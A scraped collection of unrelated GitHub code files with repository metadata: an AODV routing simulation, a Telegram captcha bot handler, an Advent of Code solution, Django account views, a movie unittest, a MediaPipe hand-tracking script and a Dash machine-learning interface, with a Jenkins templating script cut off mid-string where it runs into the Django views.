= item5.nxt_hop\n break\n\n if founded:\n # relay to next hop\n # --------- source -------------- next hop ------------ destination ------ current hop\n m = Message( str(self.id) + \"+\" + str(tmp4) + \"+\" + str(dst) + \"+\" + str(self.id) , \"Message\" , msg )\n print(\"send \" + str(self.id) + \" \" + str(msg))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n else:\n # rrq and then send message\n # --------- current hop -------------- source\n m = Message(str(self.id) + \"+\" + str(self.id), \"RRQ\", str(dst) + \"+\" + str(self.rrq_counter))\n self.rrq_received.append([str(self.id), str(dst), str(self.rrq_counter)])\n self.rrq_counter = self.rrq_counter + 1\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n\n # save message to send later\n delayed_send_thread = threading.Thread(target=self.send_msg_check, args=(msg, dst))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n def send_msg_check(self, msg, dst):\n while True:\n\n time.sleep(0.2)\n\n founded = False\n nxthop = 0\n for ii, item3 in enumerate(self.route_table):\n if int(item3.key) == int(dst):\n founded = True\n nxthop = item3.nxt_hop\n\n if founded:\n m = Message(str(self.id) + \"+\" + str(nxthop) + \"+\" + str(dst) + \"+\" + str(self.id), \"Message\", msg)\n print(\"send \" + str(self.id) + \" \" + str(msg))\n delayed_send_thread = threading.Thread(target=self.delayed_send, args=([m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n return\n else:\n continue\n\n def change_loc(self, _x, _y):\n self.x = _x\n self.y = _y\n\n self.route_table = []\n self.init_finish = False\n self.nbrs = []\n self.rrq_received = []\n self.rrq_counter = 1\n\n hello_thread = threading.Thread(target=self.hello, args=())\n hello_thread.daemon = True\n hello_thread.start()\n\n# -------------------------------------------------------------------------------------------------------------------\nclass Server:\n def __init__(self, _n, _ip, _port, _d, _nodes):\n self.ip = _ip\n self.port = _port\n self.d = _d\n self.nodes = _nodes\n self.send_thread = []\n self.n = _n\n\n self.hello_counter = 0\n self.hello_sent_counter = 0\n self.hello_ack = 0\n\n main_thread = threading.Thread(target=self.main, args=())\n main_thread.daemon = True\n main_thread.start()\n\n def main(self):\n server_thread = threading.Thread(target=self.server_up, args=())\n server_thread.daemon = True\n server_thread.start()\n time.sleep(0.1 * self.n)\n connect_thread = threading.Thread(target=self.connect, args=())\n connect_thread.daemon = True\n connect_thread.start()\n\n def server_up(self):\n server_socket = socket.socket()\n server_socket.bind((self.ip, self.port))\n while True:\n server_socket.listen(2)\n conn, address = server_socket.accept()\n listen_thread = threading.Thread(target=self.listen, args=([conn]))\n listen_thread.daemon = True\n listen_thread.start()\n\n def connect(self):\n for ii in range(len(self.nodes)):\n client_socket = socket.socket()\n client_socket.connect((self.nodes[ii][1], self.nodes[ii][2])) # ------------------------- order is imp\n self.send_thread.append(client_socket)\n\n def listen(self, conn):\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n prob_drop = random.uniform(0, 1)\n\n msg_rec = Message(**json.loads(data, encoding=\"utf-8\"))\n\n if msg_rec.type == \"hello\":\n tmp_id = 
int(msg_rec.nid) - 1\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp_id), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n self.hello_counter = self.hello_counter + 1\n tmp_id = int(msg_rec.nid) - 1\n tmp_loc = [int(item3) for item3 in msg_rec.value.split()]\n self.nodes[tmp_id][3] = tmp_loc[0]\n self.nodes[tmp_id][4] = tmp_loc[1]\n\n if self.hello_counter == n:\n self.hello_all()\n self.hello_counter = 0\n\n elif msg_rec.type == \"hello_ack\":\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(msg_rec.nid) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n nbr_list = [int(msg_rec.value)]\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [msg_rec]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n self.hello_ack = self.hello_ack + 1\n if self.hello_ack == self.hello_sent_counter:\n m = Message(str(self.n * self.n), \"init_finish\", \"none\")\n self.send_to_all([m])\n self.hello_sent_counter = 0\n self.hello_ack = 0\n\n elif msg_rec.type == \"RRQ\":\n tmp2 = msg_rec.nid.split(\"+\")\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[0]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n # --------- source -------------- prev hop\n nbr_list = self.get_nbrs(int(tmp2[0]) - 1)\n if nbr_list:\n m = Message(msg_rec.nid, \"RRQ\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"RRP\":\n\n tmp3 = msg_rec.nid.split(\"+\")\n\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp3[0]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n m = Message(tmp3[0], \"RRP\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp3[1]), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n elif msg_rec.type == \"Message\":\n # --------- source -------------- next hop ------------ destination ------ prev hop\n tmp2 = msg_rec.nid.split(\"+\")\n if prob_drop > p:\n m = Message(\" \", \"drop\", \" \")\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[3]) - 1, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n print(\"Drop\")\n continue\n\n\n m = Message(tmp2[0] + \"+\" + tmp2[3] + \"+\" + tmp2[2], \"Message\", msg_rec.value)\n delayed_send_thread = threading.Thread(target=self.send_single, args=(int(tmp2[1]), [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n\n def hello_all(self):\n for iii in range(n):\n nbr_list = self.get_nbrs(iii)\n\n if nbr_list:\n m = Message(str(iii + 1), \"hello\", str(self.nodes[iii][3]) + \" \" + str(self.nodes[iii][4]))\n delayed_send_thread = threading.Thread(target=self.send_nbrs, args=(nbr_list, [m]))\n delayed_send_thread.daemon = True\n delayed_send_thread.start()\n self.hello_sent_counter = self.hello_sent_counter + len(nbr_list)\n\n def send_to_all(self, msg):\n byte_array = 
json.dumps(msg[0].__dict__).encode(\"utf-8\")\n for item3 in self.send_thread:\n time.sleep(random.uniform(0, 1))\n item3.send(byte_array)\n\n def send_single(self, dst, msg):\n byte_array = json.dumps(msg[0].__dict__).encode(\"utf-8\")\n time.sleep(random.uniform(0, 1))\n self.send_thread[dst - 1].send(byte_array)\n\n def send_nbrs(self, nbr_list, msg):\n byte_array = json.dumps(msg[0].__dict__).encode(\"utf-8\")\n for item3 in nbr_list:\n time.sleep(random.uniform(0, 1))\n self.send_thread[item3 - 1].send(byte_array)\n\n def get_nbrs(self, xx):\n nbr_list = []\n for item3 in self.nodes:\n if item3[0] != self.nodes[xx][0]:\n if (item3[3] - self.nodes[xx][3] ) * (item3[3] - self.nodes[xx][3] ) + (item3[4] - self.nodes[xx][4]) * (item3[4] - self.nodes[xx][4]) < self.d * self.d:\n nbr_list.append(item3[0])\n return nbr_list\n\n# Main ------------------------------------------------------------------------------\n# input\nd = int(input())\nx = int(input())\ny = int(input())\nn = int(input())\n\nnode_data = []\nfor i in range(n):\n tmp = input().split()\n node_data.append(tmp)\n\ng = BattleGround(x, y)\nserver_ip = \"127.0.0.1\"\nserver_port = 6000\n\nnodes = []\n# Node Constructor\nfor i in range(n):\n tmp = node_data[i]\n nodes.append(Vehicle(int(tmp[0]), int(tmp[3]), int(tmp[4]), tmp[1], int(tmp[2]), int(tmp[5]), server_ip, server_port ,g, n))\n\n# Prepare data foe server\nnode_data = []\nfor i in range(n):\n node_data.append([nodes[i].id, nodes[i].ip, nodes[i].port, 0, 0])\nserver = Server(n, server_ip, server_port, d, node_data)\n\n# wait until first step is finished\nwhile True:\n tmp = True\n for item in nodes:\n tmp = item.init_finish and tmp\n if tmp:\n print(\"Initialization has been finished successfully\")\n break\n\nf = open(\"scenario.txt\", \"r\")\nf1 = f.readlines()\ncommands = []\nfor x in f1:\n commands.append(x)\n\nfor item in commands:\n tmp = item.split(\" \")\n\n if tmp[0] == \"SendMessage\":\n info = tmp[1].split(\"-\")\n nodes[int(info[0]) - 1].send_msg(info[1], int(info[2]) - 1)\n\n elif tmp[0] == \"ChangeLoc\":\n print(\"change location\")\n # do the work\n tmp3 = \"\"\n for item3 in tmp[1:]:\n tmp2 = item3.split(\"-\")\n if int(tmp2[1]) > g.x or int(tmp2[2]) > g.y:\n print(\"location error\")\n else:\n tmp3 = tmp3 + str(tmp2[0]) + \"(\" + str(tmp2[1]) + \",\" + str(tmp2[2]) + \")\" + \"-\"\n print(tmp3)\n\n for item2 in tmp[1:]:\n tmp2 = item2.split(\"-\")\n nodes[int(tmp2[0]) - 1].change_loc(int(tmp2[1]), int(tmp2[2]))\n\n # wait to finish the job\n while True:\n tmp = True\n for item2 in nodes:\n tmp = item2.init_finish and tmp\n if tmp:\n print(\"New neighbors has been founded successfully\")\n break\n\n elif tmp[0] == \"Wait\":\n print(\"Waiting ............... 
\")\n time.sleep(int(tmp[1]))\n\ntime.sleep(n * n * n)\n","repo_name":"mhmd97z/data-network-simulations-assignments","sub_path":"aodv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39732546215","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import CallbackQuery, InputMediaPhoto\n\nfrom bot.db.requests import DbRequests\nfrom bot.keyboards.inline_keyboards import create_inline_kb, main_menu_keyboard\nfrom bot.services.captcha_generator import get_captcha_image_with_buttons\nfrom bot.states.verification import UserVerification\n\n\nasync def process_fail_captcha(callback: CallbackQuery,\n db_request: DbRequests,\n state: FSMContext):\n\n callback.bot.captcha_count -= 1\n captcha_count = callback.bot.captcha_count\n if captcha_count > 0:\n captcha, options = get_captcha_image_with_buttons()\n keyboard = create_inline_kb(2, *options)\n\n callback.message.bot.data['captcha_key'] = captcha['key']\n await callback.message.edit_media(\n media=InputMediaPhoto(captcha['img']),\n reply_markup=keyboard)\n\n alert_text = f\"Вы неверно разгадали капчу.\\\n Попыток осталось: {captcha_count}\"\n await callback.answer(\n text=alert_text, show_alert=True)\n else:\n await state.reset_state()\n await db_request.block_user(callback.from_user.id)\n await callback.bot.delete_message(\n callback.message.chat.id, callback.message.message_id)\n await callback.answer('Вы заблокированы!!')\n\n await callback.answer()\n\n\nasync def process_success_captcha(callback: CallbackQuery,\n db_request: DbRequests,\n state: FSMContext):\n await state.finish()\n await db_request.verify_user(callback.from_user.id)\n\n await callback.message.answer_photo(\n photo='AgACAgIAAxkBAAOnZBsVA1ZXmdFmg_ob5SNPv8dWiU8AAonJMRvXNdlIt42MBjLEiioBAAMCAANzAAMvBA', # noqa: E501\n caption='• Зарабатывай $TON получая рекламу\\n'\n '• Получи тысячи активных пользователей отправив $TON',\n reply_markup=main_menu_keyboard(), parse_mode='HTML')\n await callback.bot.delete_message(\n callback.message.chat.id, callback.message.message_id)\n await callback.answer()\n\n\ndef register_captcha_handlers(dp: Dispatcher):\n dp.register_callback_query_handler(\n process_fail_captcha,\n lambda btn: btn.data != btn.bot.data.get(\n 'captcha_key'),\n state=UserVerification.CaptchaState)\n dp.register_callback_query_handler(\n process_success_captcha,\n lambda btn: btn.data == btn.bot.data.get(\n 'captcha_key'),\n state=UserVerification.CaptchaState)\n","repo_name":"makedream1/capwallet","sub_path":"bot/bot/handlers/captcha_handlers.py","file_name":"captcha_handlers.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26134001731","text":"'''\nhttps://adventofcode.com/2017/day/6\n'''\nDAY = 6\n\nfrom utils import *\nfrom collections import deque\n\n\ndef parser(test=False):\n return deque(Input(DAY, 2017, test=test, line_parser=integers)[0])\n\n\ndef reallocate(banks):\n\n red_blocks = max(banks)\n rot = -banks.index(red_blocks)\n banks.rotate(rot)\n banks[0] = 0\n\n banks.rotate(-1)\n rot -= 1\n\n while red_blocks:\n banks[0] += 1\n red_blocks -= 1\n banks.rotate(-1)\n rot -= 1\n\n banks.rotate(-rot)\n \n return banks\n\n\ndef part1(input):\n banks = input\n visited = set()\n visited.add(tuple(banks))\n\n cycles = 0\n while True:\n \n banks = reallocate(banks)\n cycles += 1\n\n 
t_banks = tuple(banks)\n if t_banks in visited:\n return cycles, banks\n\n visited.add(t_banks)\n \n \n\ndef part2(input):\n pass\n \n\ndef main():\n input = parser()\n print('RESULTS')\n\n result_1, rep_config = part1(input)\n print(f'Part 1: {result_1}')\n\n result_2, _ = part1(rep_config)\n print(f'Part 2: {result_2}')\n\n\nif __name__ == \"__main__\":\n test(DAY, parser, \n lambda i: part1(i)[0], [5], \n lambda i: part1(part1(i)[1])[0], [4])\n main()","repo_name":"jacoboglez/adventofcode","sub_path":"2017/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27115114583","text":"import argparse\nimport glob\nimport os\nimport re\nimport shutil\nfrom distutils.dir_util import copy_tree\nfrom tempfile import TemporaryDirectory\n\nfrom jenkins_config_templating import execute_config_templating, read_symlink_entries\n\nBASH_SCRIPT_JENKINS_TO_TEMP = \\\n 'ssh-keygen -R {}; ssh -C ubuntu@{} \"bash -s\" < Invalid

    \")\n user = MyUser.objects.get(id=request.user.id)\n admins = MyUser.objects.filter(groups__name='super-admin')\n students = Students.objects.all().select_related()\n teachers = Teachers.objects.all().select_related()\n context = {\n 'students': students,\n 'teachers': teachers,\n 'admins': admins\n }\n print(user)\n if(user in admins):\n return render(request, 'accountinfo/admins.html', context)\n if user in MyUser.objects.filter(groups__name='Student'):\n return students_view(request, context)\n if user in MyUser.objects.filter(groups__name='Teacher'):\n return render(request, 'accountinfo/teach.html', context)\n\n return HttpResponse(\"You are nobody\")\n\n#View file for the student role, shows them only their own data\ndef students_view(request, context):\n me = MyUser.objects.filter(id=request.user.id)[0]\n print(me.first_name, me.date_of_birth)\n email = me.id\n name = me.first_name\n dob = me.date_of_birth\n return HttpResponse(f'Your details are \\n Email-ID: {email} \\n Name: {name} \\n DOB: {dob}')\n\n#View function to be used by the admin role only, to add new teachers\ndef add_teacher(request):\n if request is None:\n return None\n new_t_email = request.POST[\"teacheremail\"]\n new_t_name = request.POST[\"newname\"]\n if len(list(Teachers.objects.filter(email=new_t_email))) > 0:\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n new_t = Teachers.objects.create(email=new_t_email, name=new_t_name)\n new_t.save()\n\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n\n#View function to be used by a teacher or an admin, to add new students\ndef add_student(request):\n print(\"Here\")\n if request is None:\n return None\n new_st_email = request.POST[\"studentemail\"]\n new_st_name = request.POST[\"newname\"]\n if len(list(Students.objects.filter(email=new_st_email))) > 0:\n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n new_st = Students.objects.create(email=new_st_email, name=new_st_name)\n new_st.save()\n print(new_st.id)\n \n return HttpResponseRedirect(reverse('accountinfo:returnData'))\n","repo_name":"rtkm3131/TASK-Credicxo","sub_path":"task/Credicxo/accountinfo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36108139667","text":"from project.movie import Movie\r\nimport unittest\r\n\r\nclass TestMovie(unittest.TestCase):\r\n NAME = 'Fast10'\r\n YEAR = 2022\r\n RATING = 5.8\r\n def setUp(self):\r\n self.movie = Movie(self.NAME, self.YEAR, self.RATING)\r\n\r\n def test__name_property(self):\r\n result = self.movie.name\r\n self.assertEqual(result, self.NAME)\r\n\r\n def test__name__when_try_set_empty_string(self):\r\n with self.assertRaises(ValueError) as ex:\r\n self.movie.name = ''\r\n self.assertIsNotNone(ex)\r\n self.assertEqual('Name cannot be an empty string!', str(ex.exception))\r\n\r\n def test__name__when_change_name(self):\r\n self.movie.name = 'test1'\r\n result = self.movie.name\r\n self.assertEqual(result, 'test1')\r\n\r\n def test__year_property(self):\r\n result = self.movie.year\r\n self.assertEqual(result, self.YEAR)\r\n\r\n def test__year__when_it_is_not_valid(self):\r\n with self.assertRaises(ValueError) as ex:\r\n self.movie.year = 1885\r\n self.assertIsNotNone(ex)\r\n self.assertEqual('Year is not valid!', str(ex.exception))\r\n\r\n def test__year__when_change_year(self):\r\n self.movie.year = 1990\r\n result = self.movie.year\r\n self.assertEqual(result, 1990)\r\n\r\n 
def test__add_actor__when_it_is_possible(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n self.assertTrue(actor in self.movie.actors)\r\n\r\n def test__add_actor__when_it_is_already_added(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n result = self.movie.add_actor(actor)\r\n expected_result = f'{actor} is already added in the list of actors!'\r\n self.assertEqual(result, expected_result)\r\n\r\n\r\n def test__gt__when_first_is_great(self):\r\n movie2 = Movie('Fast09', 2000, self.RATING - 0.1)\r\n result = self.movie > movie2\r\n expected_result = f'\"{self.movie.name}\" is better than \"{movie2.name}\"'\r\n self.assertEqual(result, expected_result)\r\n\r\n def test__gt__when_second_is_great(self):\r\n movie2 = Movie('Fast09', 2000, self.RATING + 0.1)\r\n result = self.movie > movie2\r\n expected_result = f'\"{movie2.name}\" is better than \"{self.movie.name}\"'\r\n self.assertEqual(result, expected_result)\r\n\r\n def test__repr__(self):\r\n actor = 'Mitko Kiosev'\r\n self.movie.add_actor(actor)\r\n result = str(self.movie)\r\n expected_result = f\"Name: {self.NAME}\\nYear of Release: {self.YEAR}\\nRating: {self.RATING:.2f}\\nCast: Mitko Kiosev\"\r\n self.assertEqual(result, expected_result)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"dimitarkiosev/Python-OOP-Jun-2022","sub_path":"11. Exams/02. Python OOP Exam - 10 April 2022/3. Testing/test_movie.py","file_name":"test_movie.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40632348439","text":"# Created by Aryan Maurya\n\nimport cv2\nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\n\nmpHands = mp.solutions.hands\nhands = mpHands.Hands()\nmpDraw = mp.solutions.drawing_utils # using mpDraw to draw the 21 points on hand\n\nprevTime = 0 # previous time is 0\ncurrTime = 0 # current time is 0\n\nwhile True:\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # converting imagery to RGB\n results = hands.process(imgRGB)\n\n # print(results.multi_hand_landmarks) --> prints landmarks if hand is detected\n\n if results.multi_hand_landmarks:\n for handLms in results.multi_hand_landmarks: # considering each hand tracked\n for id, lm in enumerate(handLms.landmark):\n # print(id, lm)\n # prints the id from 0 to 20 on x,y and z co-ordinates in decimal values.\n\n h, w, c = img.shape # height,width and channel of image\n\n cx, cy = int(lm.x * w), int(lm.y * h)\n # central x and y axis -> taking integer value of x multiplied by width and int value of y multiplied by height\n print(id, cx, cy)\n # prints id no, cx & cy position\n\n if id == 0:\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n # draws a small magenta circle on id 0 (i.e. 
on the wrist) of radius 15.\n\n mpDraw.draw_landmarks(img, handLms, mpHands.HAND_CONNECTIONS) # handLms --> single hand , Hand Connections to connect the dots\n\n\n currTime = time.time() # stores the exact time during runtime\n fps = 1/(currTime-prevTime) # formula to calculate frames per second\n prevTime = currTime # previous time changes to current time\n\n cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)\n # inserting FPS monitor in img display as integer value.\n # (10,70) is the position for monitor, 3 and 3 are scale and thickness respectively.\n # (255,0,255) represents magenta color which is used for displaying fps.\n\n\n cv2.imshow(\"Image\", img) # Displays the original image\n cv2.waitKey(1)\n","repo_name":"aryan-maurya/Volume-Gesture-Control","sub_path":"HandTrack.py","file_name":"HandTrack.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"16407292603","text":"import json\nimport os\nimport logging\nimport pathlib\nimport shutil\nimport zipfile, time\nimport uuid, requests\n\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State, MATCH, ALL\nimport dash_uploader as du\nimport dash_table\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport pandas as pd\nimport PIL.Image as Image\nimport plotly.graph_objects as go\n\nfrom file_manager import filename_list, move_a_file, move_dir, add_paths_from_dir, \\\n check_duplicate_filename, docker_to_local_path, local_to_docker_path, file_explorer\nfrom helper_utils import SimpleJob\nfrom helper_utils import plot_figure, get_bottleneck, get_job, generate_loss_plot, load_from_dir, str_to_dict, \\\n model_list_GET_call, get_gui_components, get_counter, get_host\nfrom assets.kwarg_editor import JSONParameterEditor\nimport templates\n\n\n### GLOBAL VARIABLES AND DATA LOADING\nDATA_DIR = str(os.environ['DATA_DIR'])\nMODEL_DATABASE = {\"The Model\": \"path-to-model\"} # hardcoded model database as dict\nUSER = 'admin'\nMODELS = model_list_GET_call()\nDOCKER_DATA = pathlib.Path.home() / 'data'\nLOCAL_DATA = str(os.environ['DATA_DIR'])\nDOCKER_HOME = str(DOCKER_DATA) + '/'\nLOCAL_HOME = str(LOCAL_DATA)\nUPLOAD_FOLDER_ROOT = DOCKER_DATA / 'upload'\nSUPPORTED_FORMATS = ['tiff', 'tif', 'jpg', 'jpeg', 'png']\nHOST_NICKNAME = str(os.environ['HOST_NICKNAME'])\nnum_processors, num_gpus = get_host(HOST_NICKNAME)\n\n#### SETUP DASH APP ####\nexternal_stylesheets = [dbc.themes.BOOTSTRAP, \"../assets/segmentation-style.css\"]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets) #, suppress_callback_exceptions=True)\n# server = app.server\napp.title = \"Data Clinic\"\napp._favicon = 'mlex.ico'\ndu.configure_upload(app, UPLOAD_FOLDER_ROOT, use_upload_id=False)\nlogging.getLogger('werkzeug').setLevel(logging.ERROR)\n\n### BEGIN DASH CODE ###\nheader = templates.header()\n\nSIDEBAR = [\n dbc.Card(\n id=\"sidebar\",\n children=[\n dbc.CardHeader(\"Exploring Data with Machine Learning\"),\n dbc.CardBody([\n dbc.FormGroup([\n dbc.Label('Action'),\n dcc.Dropdown(\n id='action',\n options=[\n {'label': 'Model Training', 'value': 'train_model'},\n # {'label': 'Latent Space Exploration', 'value': 'evaluate_model'},\n {'label': 'Test Prediction using Model', 'value': 'prediction_model'},\n ],\n value='train_model')\n ]),\n dbc.FormGroup([\n dbc.Label('Model'),\n dcc.Dropdown(\n id='model-selection',\n 
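# MODELS is fetched once at import time via model_list_GET_call(), so the\n # dropdown lists the models registered when the app was started.\n 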
options=MODELS,\n value=MODELS[0]['value'])\n ]),\n dbc.FormGroup([\n dbc.Label('Data'),\n file_explorer,\n ]),\n dbc.Button('Execute',\n id='execute',\n n_clicks=0,\n className='m-1',\n style={'width': '100%', 'justify-content': 'center'})\n ])\n ]\n ),\n dbc.Card(\n children=[\n dbc.CardHeader(\"Parameters\"),\n dbc.CardBody([html.Div(id='app-parameters')])\n ]\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Warning\"),\n dbc.ModalBody(id=\"warning-msg\"),\n dbc.ModalFooter([\n dbc.Button(\n \"OK\", id=\"ok-button\", color='danger', outline=False,\n className=\"ms-auto\", n_clicks=0\n ),\n ]),\n ],\n id=\"warning-modal\",\n is_open=False,\n ),\n dcc.Store(id='warning-cause', data=''),\n dcc.Store(id='counters', data=get_counter(USER))\n]\n\n\nLOSS_PLOT = dbc.Collapse(id = 'show-plot',\n children = dbc.Card(id=\"plot-card\",\n children=[dbc.CardHeader(\"Loss Plot\"),\n dbc.CardBody([\n dcc.Graph(id='loss-plot',\n style={'width':'100%', 'height': '20rem'})])\n ])),\n\n\n# Job Status Display\nJOB_STATUS = dbc.Card(\n children=[\n dbc.CardHeader(\"List of Jobs\"),\n dbc.CardBody(\n children=[\n dbc.Row(\n [\n dbc.Button(\"Deselect Row\", id=\"deselect-row\", style={'margin-left': '1rem'}),\n dbc.Button(\"Stop Job\", id=\"stop-row\", color='warning'),\n dbc.Button(\"Delete Job\", id=\"delete-row\", color='danger'),\n ]\n ),\n dash_table.DataTable(\n id='jobs-table',\n columns=[\n {'name': 'Job ID', 'id': 'job_id'},\n {'name': 'Type', 'id': 'job_type'},\n {'name': 'Name', 'id': 'name'},\n {'name': 'Status', 'id': 'status'},\n {'name': 'Parameters', 'id': 'parameters'},\n {'name': 'Experiment ID', 'id': 'experiment_id'},\n {'name': 'Dataset', 'id': 'dataset'},\n {'name': 'Logs', 'id': 'job_logs'}\n ],\n data=[],\n hidden_columns=['job_id', 'experiment_id', 'dataset'],\n row_selectable='single',\n style_cell={'padding': '1rem',\n 'textAlign': 'left',\n 'overflow': 'hidden',\n 'textOverflow': 'ellipsis',\n 'maxWidth': 0},\n fixed_rows={'headers': True},\n css=[{\"selector\": \".show-hide\", \"rule\": \"display: none\"}],\n page_size=8,\n style_data_conditional=[\n {'if': {'column_id': 'status', 'filter_query': '{status} = complete'},\n 'backgroundColor': 'green',\n 'color': 'white'},\n {'if': {'column_id': 'status', 'filter_query': '{status} = failed'},\n 'backgroundColor': 'red',\n 'color': 'white'},\n ],\n style_table={'height': '30rem', 'overflowY': 'auto'} #, 'overflowX': 'scroll'}\n )\n ],\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Warning\"),\n dbc.ModalBody('Models cannot be recovered after deletion. 
\\\n Do you still want to proceed?\"'),\n dbc.ModalFooter([\n dbc.Button(\n \"OK\", id=\"confirm-delete-row\", color='danger', outline=False,\n className=\"ms-auto\", n_clicks=0\n ),\n ]),\n ],\n id=\"delete-modal\",\n is_open=False,\n ),\n dbc.Modal([\n dbc.ModalHeader(\"Job Logs\"),\n dbc.ModalBody(id='log-display'),\n dbc.ModalFooter(dbc.Button(\"Close\", id=\"modal-close\", className=\"ml-auto\")),\n ],\n id='log-modal',\n size='xl')\n ]\n)\n\n\n# main section with interactive graph (card 1) and job table (card 2)\ncolumn_02 = html.Div([\n dbc.Card(\n id=\"inter_graph\",\n style={\"width\" : \"100%\"},\n children=[\n dbc.CardHeader(\"Graphical Representation\", className=\"card-title\"),\n dbc.CardBody(\n dbc.Col(\n [dbc.Row([\n html.Img(id='orig_img', title=\"Input Image\",\n style={'width':'15vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'}),\n html.Img(id='ls_graph', title='',\n style={'width':'30vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'}),\n html.Img(id='rec_img', title=\"Reconstructed Image\",\n style={'width':'15vw', 'height': '200px', 'padding':'0px', 'display': 'inline-block'})\n ], align=\"center\", justify='center'),\n dbc.Row([\n dbc.Col(dbc.Row(html.P('Input Image'), align=\"center\", justify='center'), width=3),\n dbc.Col(dbc.Row(html.P('Latent Space'), align=\"center\", justify='center')),\n dbc.Col(dbc.Row(html.P('Reconstructed Image') ,align=\"center\", justify='center'), width=3),\n ], align=\"center\", justify='center'),\n dbc.Label('Image: ', id='current-image-label'),\n dcc.Slider(id='img-slider',\n min=0,\n value=0,\n tooltip={'always_visible': True, 'placement': 'bottom'})]\n ), style={'margin-bottom': '0rem', 'align-items': 'center', 'justify-content': 'center'}\n ),\n dbc.CardFooter(id='data-size-out')\n ]),\n html.Div(LOSS_PLOT),\n JOB_STATUS,\n dcc.Interval(id='interval', interval=5 * 1000, n_intervals=0),\n])\n\n\nRESOURCES_SETUP = html.Div(\n [\n dbc.Modal(\n [\n dbc.ModalHeader(\"Choose number of computing resources:\"),\n dbc.ModalBody(\n children=[\n dbc.FormGroup([\n dbc.Label(f'Number of CPUs (Maximum available: {num_processors})'),\n dbc.Input(id='num-cpus',\n type=\"int\",\n value=2)]),\n dbc.FormGroup([\n dbc.Label(f'Number of GPUs (Maximum available: {num_gpus})'),\n dbc.Input(id='num-gpus',\n type=\"int\",\n value=0)]),\n dbc.FormGroup([\n dbc.Label('Model Name'),\n dbc.Input(id='model-name',\n type=\"str\",\n value=\"\")])\n ]),\n dbc.ModalFooter(\n dbc.Button(\n \"Submit Job\", id=\"submit\", className=\"ms-auto\", n_clicks=0\n )\n ),\n ],\n id=\"resources-setup\",\n centered=True,\n is_open=False,\n ),\n ]\n)\n\n\n##### DEFINE LAYOUT ####\napp.layout = html.Div(\n [\n header,\n dbc.Container(\n [\n dbc.Row(\n [dbc.Col(SIDEBAR, width=4),\n dbc.Col(column_02, width=8),\n html.Div(id='dummy-output')]\n ),\n RESOURCES_SETUP\n ],\n fluid=True\n )\n ]\n)\n\n\n##### FILE MANAGER CALLBACKS ####\n@app.callback(\n Output(\"collapse\", \"is_open\"),\n Input(\"collapse-button\", \"n_clicks\"),\n 